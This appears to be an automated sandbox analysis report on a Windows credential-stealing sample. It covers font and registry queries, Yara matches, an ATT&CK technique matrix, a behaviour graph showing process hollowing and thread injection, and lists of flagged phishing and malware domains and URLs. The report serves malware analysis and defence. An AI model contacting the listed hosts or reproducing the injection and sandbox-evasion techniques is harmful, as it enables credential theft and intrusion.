        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\0098764345678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        512
        Process Injection
        1
        Masquerading
        OS Credential Dumping221
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        Exfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Shared Modules
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        1
        Disable or Modify Tools
        LSASS Memory2
        Process Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Ingress Tool Transfer
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion
        Security Account Manager31
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
        Process Injection
        NTDS1
        Remote System Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer12
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets112
        System Information Discovery
        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common4
        Obfuscated Files or Information
        Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items13
        Software Packing
        DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680503 Sample: 0098764345678.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 31 www.zytfjgyl.com 2->31 33 www.7ball123a.website 2->33 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 Antivirus / Scanner detection for submitted sample 2->45 47 8 other signatures 2->47 11 0098764345678.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\0098764345678.exe.log, ASCII 11->29 dropped 55 Tries to detect virtualization through RDTSC time measurements 11->55 15 0098764345678.exe 11->15         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 Queues an APC in another process (thread injection) 15->63 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.whipbull.com 103.224.212.221, 49790, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 18->35 37 www.secure-id6793-chase.com 194.195.211.26, 49806, 80 NEXINTO-DE Germany 18->37 39 192.168.2.1 unknown unknown 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msiexec.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        0098764345678.exe29%ReversingLabsByteCode-MSIL.Spyware.Noon
        0098764345678.exe100%AviraHEUR/AGEN.1235476
        0098764345678.exe100%Joe Sandbox ML
        No Antivirus matches
        SourceDetectionScannerLabelLinkDownload
        4.0.0098764345678.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        0.0.0098764345678.exe.2e0000.0.unpack100%AviraHEUR/AGEN.1235476Download File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.fonts.comc0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.secure-id6793-chase.com/zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5Tjp100%Avira URL Cloudphishing
        http://www.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqE100%Avira URL Cloudmalware
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.fonts.comX0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.fonts.comLQ0%Avira URL Cloudsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.tiro.comcom0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.fonts.comB0%Avira URL Cloudsafe
        www.secure-id6793-chase.com/zzun/100%Avira URL Cloudphishing
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.fontbureau.comgritakD0%Avira URL Cloudsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.fontbureau.comFXD0%Avira URL Cloudsafe
        http://ww25.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.secure-id6793-chase.com
        194.195.211.26
        truetrue
          unknown
          www.whipbull.com
          103.224.212.221
          truetrue
            unknown
            www.7ball123a.website
            unknown
            unknowntrue
              unknown
              www.zytfjgyl.com
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
